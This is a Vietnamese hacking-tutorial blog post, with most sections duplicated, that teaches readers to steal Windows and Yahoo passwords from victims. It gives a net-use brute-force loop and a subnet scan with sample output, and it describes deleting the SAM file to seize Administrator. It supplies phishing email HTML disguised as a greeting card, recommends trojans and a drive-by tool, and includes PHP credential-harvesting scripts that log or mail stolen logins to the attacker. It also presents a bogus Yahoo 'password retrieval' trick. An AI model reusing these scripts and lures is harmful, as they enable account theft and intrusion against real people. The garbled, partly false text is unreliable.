Đánh cắp mật khẩu của window.....
tạo một tệp tin, trong đó có chứa username và password tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
........... .....................
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j
Lệnh này lấy 2 "từ vị" ở mỗi dòng, và lấy "từ vị" đầu cho biến %i (password), và "từ" vị thứ 2 cho biến %j trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy những ổ "ảo", nghĩa là không có trên máy ví dụ ổ H: hay I: V:
Lệnh này đã được mình test thành cÿng !------------------------------------------------>babyhacker<-------------------------------------------------------
Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt
--- Checking host : 192.168.202.1[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
........... .....................
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j
Lệnh này lấy 2 "từ vị" ở mỗi dòng, và lấy "từ vị" đầu cho biến %i (password), và "từ" vị thứ 2 cho biến %j trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy những ổ "ảo", nghĩa là không có trên máy ví dụ ổ H: hay I: V:
Lệnh này đã được mình test thành cÿng !------------------------------------------------>babyhacker<-------------------------------------------------------
Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt
--- Obtaining list of remote NetBIOS names
--- Attempting to connect with Username: 'ADMINISTRATOR' Password:'ADMINISTRATOR'
--- Attempting to connect with Username: 'ADMINISTRATOR' Password:'GUEST'
.......
--- CONNECTED: Username: 'ADMINISTRATOR' Password" 'PASSWORD'
--- Attempting to access share: \\*SMBSERVER\TEMP
--- WARNING: Able to acess share: \\*SMBSERVER\TEMP
......
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?
......
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?
Một cách khác nhằm đoạt quyền của Administrator ở Window
Đối với Win98 :
Không khó lắm , bạn vào start menu -->search--> Files and Folders
, bạn tìm tất cả những file *.pwl. Sau đó Xóa những file này đi, khởi
động lại máy rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60%
Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa
này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ
đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account
người dùng ,... Bạn khởi động lại máy và log in với user Administrator
, không có pass !
Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sế giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60%
Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa
này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ
đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account
người dùng ,... Bạn khởi động lại máy và log in với user Administrator
, không có pass ! Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sế giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong
+Trước hết mở hộp thư cua các bạn ra,chọn composed để bắt đầu gửi thư
+Trong phần nội dung,chọn View HTML source,sau đó biên soạn nội dung sau:
Ban co 1 buc dien hoa tu Congaquay85(hoac ten cua ban) voi tieu de nhu sau :
Chuc ban vui ve
Hay nhap chuot vao day de xem buc dien hoa
http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php
You have a greeting crad from Congaquay85 with subject :
chuc ban vui ve
Click here to view greeting card
http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php
Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào là được ;
----------------------------------------------------------------------------------------------------
<p>Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :</p>
<p>Chuc ban vui ve</p>
<p>Hay nhap chuot vao day de xem buc dien hoa</p>
<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>
<p></p>
<p>You have a greeting crad from Tran hung anh with subject :</p>
<p>chuc ban vui ve</p>
<p>Click here to view greeting card</p>
<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>
-------------------------------------------------------------------------------------------
-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở trang web giả mạo trên,lập tưc password sế bị lộ.Khi đó bạn hãy vào trang web này để xem kết quả:http://00dt1yahoofake.dk3.com
Nào,bắt đầu tấn công đi,chúc các bạn thành công!
+Trong phần nội dung,chọn View HTML source,sau đó biên soạn nội dung sau:
Ban co 1 buc dien hoa tu Congaquay85(hoac ten cua ban) voi tieu de nhu sau :
Chuc ban vui ve
Hay nhap chuot vao day de xem buc dien hoa
http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php
You have a greeting crad from Congaquay85 with subject :
chuc ban vui ve
Click here to view greeting card
http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php
Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào là được ;
----------------------------------------------------------------------------------------------------
<p>Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :</p>
<p>Chuc ban vui ve</p>
<p>Hay nhap chuot vao day de xem buc dien hoa</p>
<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>
<p></p>
<p>You have a greeting crad from Tran hung anh with subject :</p>
<p>chuc ban vui ve</p>
<p>Click here to view greeting card</p>
<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>
-------------------------------------------------------------------------------------------
-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở trang web giả mạo trên,lập tưc password sế bị lộ.Khi đó bạn hãy vào trang web này để xem kết quả:http://00dt1yahoofake.dk3.com
Nào,bắt đầu tấn công đi,chúc các bạn thành công!
Ngoài ra
bạn cũng có thể sủ dụng cách này để đạt được sác xuất thanh công cao hơn
Cách
1: đây cũng là 1 cách nhà quê, đà nẵng không dùng bạn có thể download
Ybrute - 1 chương trình dò Yahoo pass - còn cách sử dụng nó thì đừng có
hỏi tui, hỏi là tui oánh đó, lớn tướng rùi mà còn hỏi vớ vẩn. Tuy nhiên
khi mớikÿ thì tui cũng xài qua cách này, điểm yếu của cách này là chỉ
có tác dụng khi victim xài pass là 1 từ có trong từ điển hay là 1 câu
nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều thời gian (hêhê, cứ
vừa ngồi đợi nó tìm mà nghe tiền bay dần khỏi túi).
#Cách
2: bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt
chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ
pass và user name thì alê hấp, pass bay như chim về email của ta, còn
victim thì vẫn vào hòm thư mà khÿng hề hay biết. Việc này bạn có thể
thực hiện dễ dàng bằng front page xây dưng mà không cần hiểu biết
nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc
dụ victim vào tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra
ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để
câu, chắc chắn là sế có nhiều chú thỏ vào bẫy.
#Cách
3: Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password
email, dial-up, account... như là: Hoocker,Barrio5.0,Barox,
Kuang2,....! Bạn có thể Download chúng ở đầy rẫy trên mạng ở các trang
hacker.
Bạn có thể gửi Trojan cho victim như một file đính kềm và khi victim mở file đó Trojan sế có chỗ trú ngụ trong máy của victim và thế là password của họ sế "chảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui
Nếu bạn có thể tạo trang Web bạn có thể đính kềm Trojan vào trang Web để khi victim vào trang web đó của bạn Trojan sế được tự động down về máy victim mà họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để đính kềm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.
#Cách 4 Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: lookdown_pass@yahoo.com <mailto:lookdown_pass@yahoo.com>
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript sau:
/config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com nhe!)
Ví dụ:
Tên login của bạn là "hacker", password là "nobody" và địa chỉ muốn lấy pass là "victim@yahoo.com <mailto:victim@yahoo.com>" chẳng hạn thì bạn đánh như sau:
/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="victim@yahoo.com <mailto:victim@yahoo.com>"
*The Yahoo system cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Yahoo sever tới một password của người khác. Password sế tự động được gửi đến email của bạn trong dấu"".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành cÿng chỉ khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà khÿng hỗ trợ JS thì đành bó tay thÿi, sau 2 phút chờ đợi mà khÿng thấy Yahoo sever hồi âm thì có lế bạn lên chuyển sang cách sau
#Cách 5: cách này thì 100% là thành công, nghe phê chưa. ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sế không dùng cái remember user name and password nữa đâu.
Cách 6: 1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sế báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sế báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sế được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ chờ cho victim checkmail là OK!
Bạn có thể gửi Trojan cho victim như một file đính kềm và khi victim mở file đó Trojan sế có chỗ trú ngụ trong máy của victim và thế là password của họ sế "chảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui
Nếu bạn có thể tạo trang Web bạn có thể đính kềm Trojan vào trang Web để khi victim vào trang web đó của bạn Trojan sế được tự động down về máy victim mà họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để đính kềm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.
#Cách 4 Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: lookdown_pass@yahoo.com <mailto:lookdown_pass@yahoo.com>
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript sau:
/config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com nhe!)
Ví dụ:
Tên login của bạn là "hacker", password là "nobody" và địa chỉ muốn lấy pass là "victim@yahoo.com <mailto:victim@yahoo.com>" chẳng hạn thì bạn đánh như sau:
/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="victim@yahoo.com <mailto:victim@yahoo.com>"
*The Yahoo system cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Yahoo sever tới một password của người khác. Password sế tự động được gửi đến email của bạn trong dấu"".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành cÿng chỉ khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà khÿng hỗ trợ JS thì đành bó tay thÿi, sau 2 phút chờ đợi mà khÿng thấy Yahoo sever hồi âm thì có lế bạn lên chuyển sang cách sau
#Cách 5: cách này thì 100% là thành công, nghe phê chưa. ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sế không dùng cái remember user name and password nữa đâu.
Cách 6: 1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sế báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sế báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sế được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ chờ cho victim checkmail là OK!
Tuy nhiên hiện nay bravenet
đã yêu cầu chứng nhận thông tin của emailform trước khi gửi đi do đó
chúng ta chỉ dùng cách này để tham khảo mà khÿng dùng được nữa vì nạn
nhân sế phát hiện ra ngay. Bởi vậy, tại sao chúng ta khÿng tự tạo ra
code cho mình, vừa nhiều tính năng hơn lại khỏi phải phụ thuộc.
2. Tự tạo code:
Trước tiên, bạn đăng kÿ một free host có hỗ trợ PHP, tÿi thấy tốt nhất là cái http://tripod.lycos.co.uk việc này rất dễ , chỉ cần bạn đăng kÿ làm thành viên của trang này, sau đó làm theo các chỉ dẫn mà nó gửi về mail cho bạn là có thể có một free host dạng:
http://members.lycos.co.uk/tenban
host này có acount FTP nhưng không thể dùng được mà các bạn phải dùng web2ftp.com mà upload. Dùng trang này rất dễ, bên phần "thiết kế và xuất bản web, trong bài 1.2.3 cùng làm forum"tÿi có bài hướng dẫn dùng web2ftp.com rất cụ thể. Nào chúng ta làm:
1. tạo các tệp sau: (dùng Notepate, sau đó khi save chọn Allfile với tên tệp là yahoo1.php chẳng hạn)
yahoo1.php:
<?
$f=fopen("yahoo.html","a");
fwrite($f,"$login@yahoo.com : 0wd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
yahoo2.php:
<?
$f=fopen("yahoo.txt","a");
fwrite($f,"$login@yahoo.com : 0wd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
yahoo3.php
<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : 0wd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src =ym&.last=&promo=&.intltype=us&.bypass=&.partner=&.u= 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
Tạo tiếp 2 tệp trắng (không có nội dung gì ) là: yahoo.html và yahoo.txt
2. Dùng http://web2ftp.com upload 5 tệp này lên trang lycos của bạn
3. Dùng code:
a. Thay code của bravenet (nếu trước đó bạn đang dùng code của bravenet) bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo3.php" method="post">
nếu bạn muốn gửi kết quả về mail cho bạn
b. Thay code của bravenet bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo1.php" method="post">
nếu bạn muốn kết quả được in ra trang yahoo.html sau đó mỗi lần xem bạn chỉ cần gõ:
http://members.lycos.co.uk/tenban/yahoo.html
c. Thay code của bravenet bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo2.php" method="post">
nếu bạn muốn kết quả được in ra trang yahoo.txt sau đó mỗi lần xem bạn dùng FTP mở trang này ra hoặc có thể gõ http://members.lycos.co.uk/tenban/yahoo.txt nếu bạn chmod file yahoo.txt là 666 (-rw-rw-rw)
Chú ÿ, nếu bạn dùng emalform khÿng phải là copy của trang mail.yahoo.com thì khi tạo form nhớ đặt Name cho ÿ "login" và "đăng nhập" lần lượt là login và passwd.
2. Tự tạo code:
Trước tiên, bạn đăng kÿ một free host có hỗ trợ PHP, tÿi thấy tốt nhất là cái http://tripod.lycos.co.uk việc này rất dễ , chỉ cần bạn đăng kÿ làm thành viên của trang này, sau đó làm theo các chỉ dẫn mà nó gửi về mail cho bạn là có thể có một free host dạng:
http://members.lycos.co.uk/tenban
host này có acount FTP nhưng không thể dùng được mà các bạn phải dùng web2ftp.com mà upload. Dùng trang này rất dễ, bên phần "thiết kế và xuất bản web, trong bài 1.2.3 cùng làm forum"tÿi có bài hướng dẫn dùng web2ftp.com rất cụ thể. Nào chúng ta làm:
1. tạo các tệp sau: (dùng Notepate, sau đó khi save chọn Allfile với tên tệp là yahoo1.php chẳng hạn)
yahoo1.php:
<?
$f=fopen("yahoo.html","a");
fwrite($f,"$login@yahoo.com : 0wd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
yahoo2.php:
<?
$f=fopen("yahoo.txt","a");
fwrite($f,"$login@yahoo.com : 0wd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
yahoo3.php
<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : 0wd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src =ym&.last=&promo=&.intltype=us&.bypass=&.partner=&.u= 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=0wd&.persistent=");
?>
Tạo tiếp 2 tệp trắng (không có nội dung gì ) là: yahoo.html và yahoo.txt
2. Dùng http://web2ftp.com upload 5 tệp này lên trang lycos của bạn
3. Dùng code:
a. Thay code của bravenet (nếu trước đó bạn đang dùng code của bravenet) bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo3.php" method="post">
nếu bạn muốn gửi kết quả về mail cho bạn
b. Thay code của bravenet bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo1.php" method="post">
nếu bạn muốn kết quả được in ra trang yahoo.html sau đó mỗi lần xem bạn chỉ cần gõ:
http://members.lycos.co.uk/tenban/yahoo.html
c. Thay code của bravenet bằng:
<FORM action="http://members.lycos.co.uk/tenban/yahoo2.php" method="post">
nếu bạn muốn kết quả được in ra trang yahoo.txt sau đó mỗi lần xem bạn dùng FTP mở trang này ra hoặc có thể gõ http://members.lycos.co.uk/tenban/yahoo.txt nếu bạn chmod file yahoo.txt là 666 (-rw-rw-rw)
Chú ÿ, nếu bạn dùng emalform khÿng phải là copy của trang mail.yahoo.com thì khi tạo form nhớ đặt Name cho ÿ "login" và "đăng nhập" lần lượt là login và passwd.
Gửi Bởi :>>>> Admin
Nhận xét
Đăng nhận xét